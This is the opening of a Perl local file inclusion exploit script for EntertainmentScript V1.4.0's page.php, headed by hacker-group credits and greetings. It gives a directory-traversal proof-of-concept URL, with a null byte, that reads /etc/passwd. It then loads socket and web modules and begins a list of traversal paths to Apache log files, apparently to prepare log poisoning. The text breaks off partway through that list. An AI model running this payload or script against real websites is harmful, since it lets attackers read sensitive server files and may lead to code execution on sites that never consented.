1 #!/usr/bin/perl
2 # EntertainmentScript V1.4.0 (( page.php page)) Local File Inclusion Exploit
3 ########################################
4 #[*] Founded & Exploited by : Stack−Terrorist [v40]
5 #[*] Contact: Ev!L =>> see down
6 #[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & All muslims HaCkeRs :)
7 # P0c : http://localhost.il/page.php?page=../../../../../etc/passwd%00
8 ########################################
9 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#
10 ########################################
11 # * TITLE: PerlSploit Class
12 # * REQUIREMENTS: PHP 4 / PHP 5
13 # * VERSION: v.1
14 # * LICENSE: GNU General Public License
15 # * ORIGINAL URL: http://www.v4−Team/v4.txt
16 # * FILENAME: PerlSploitClass.pl
17 # *
18 # * CONTACT: dj−moad@hotmail.fr (french / english / arabic / moroco Darija :d )
19 # * THNX : AllaH
20 # * GREETZ: Houssamix & Djekmani
21 ########################################
22 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#
23 ########################################
24 use IO::Socket;
25 use LWP::Simple;
26 ########################################
27 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−ripped−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#
28 ########################################
29 @apache=(
30 "../../../../../var/log/httpd/access_log",
31 "../../../../../var/log/httpd/error_log",
32 "../apache/logs/error.log",
33 "../apache/logs/access.log",
34 "../../apache/logs/error.log",
35 "../../apache/logs/access.log",
36 "../../../apache/logs/error.log",
37 "../../../apache/logs/access.log",
38 "../../../../apache/logs/error.log",
39 "../../../../apache/logs/access.log",
40 "../../../../../apache/logs/error.log",
41 "../../../../../apache/logs/access.log",
42 "../logs/error.log",
43 "../logs/access.log",
44 "../../logs/error.log",
45 "../../logs/access.log",
46 "../../../logs/error.log",
47 "../../../logs/access.log",
48 "../../../../logs/error.log",
49 "../../../../logs/access.